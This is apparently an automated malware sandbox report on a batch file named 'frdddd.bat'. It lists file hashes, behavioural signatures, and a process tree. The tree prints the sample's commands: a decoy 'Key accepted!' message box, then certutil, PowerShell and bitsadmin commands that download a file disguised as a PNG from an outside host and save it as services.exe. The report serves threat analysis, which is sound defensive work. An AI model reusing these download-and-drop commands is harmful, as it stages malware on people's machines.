Analysis
-
max time kernel
680s -
max time network
691s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
26/07/2024, 17:39
Static task
static1
Behavioral task
behavioral1
Sample
frdddd.bat
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
frdddd.bat
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
frdddd.bat
Resource
win10v2004-20240709-en
General
-
Target
frdddd.bat
-
Size
1KB
-
MD5
88ddf78c950140af764db059bec7dec8
-
SHA1
ad23a435fcaf3a66a4caa483e55b47e52a9db902
-
SHA256
6cbc3c8e40db05db5086c922bfdfc09eba597d00feb4de442ccc210c11adfdcd
-
SHA512
f0a486fcf8890a2eacfcd704b93f102e13b0ea21589a2740a81fb48818c101c95cbb8c01b381915186578b8a4d7aaf11dcd53f467f7618b60189a47f3a4486cf
Malware Config
Signatures
-
pid Process 2692 powershell.exe 1464 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 3020 bitsadmin.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2692 powershell.exe 1464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 1464 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2716 wrote to memory of 2692 2716 cmd.exe 31 PID 2716 wrote to memory of 2692 2716 cmd.exe 31 PID 2716 wrote to memory of 2692 2716 cmd.exe 31 PID 2716 wrote to memory of 2740 2716 cmd.exe 32 PID 2716 wrote to memory of 2740 2716 cmd.exe 32 PID 2716 wrote to memory of 2740 2716 cmd.exe 32 PID 2716 wrote to memory of 1464 2716 cmd.exe 34 PID 2716 wrote to memory of 1464 2716 cmd.exe 34 PID 2716 wrote to memory of 1464 2716 cmd.exe 34 PID 2716 wrote to memory of 3020 2716 cmd.exe 35 PID 2716 wrote to memory of 3020 2716 cmd.exe 35 PID 2716 wrote to memory of 3020 2716 cmd.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key accepted!', 'Success')"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"2⤵PID:2740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"2⤵
- Download via BitsAdmin
PID:3020
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD533699b0d456ab857c654d32bb2e3d0dd
SHA141f8ea34091911ce5bd3bb1ae0001b2b7757afe3
SHA256856a97eb624bc867818df6621476301d7e5fee700d75ad3d1c60e0e22335c567
SHA512a443e18f62712d18fa6733382888036ea3440cfcf016827d869421ec5c87dc592de2f4d36d875815c47c4b68b3815a6abc5be5621a70c4c87ddf3cef2a90410d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SUKDE7OPGAIDYLA7PF3Z.temp
Filesize7KB
MD52274ec55bb8524294bd4da2157137a42
SHA17ca9c4c80357eaa63a7fc356051808eff70bb445
SHA256db4f6c51f3188a40d7f633f729530873e4aa6191e466a66f174c9fd880a1d1fe
SHA512a5d5ab9da17495659b99a8131742f7d659344febe5f6ca596ec5c202389c949387923265879ef2e03a1bce9bdd52d749ff7c7cec627f385fbdec929fe41372c8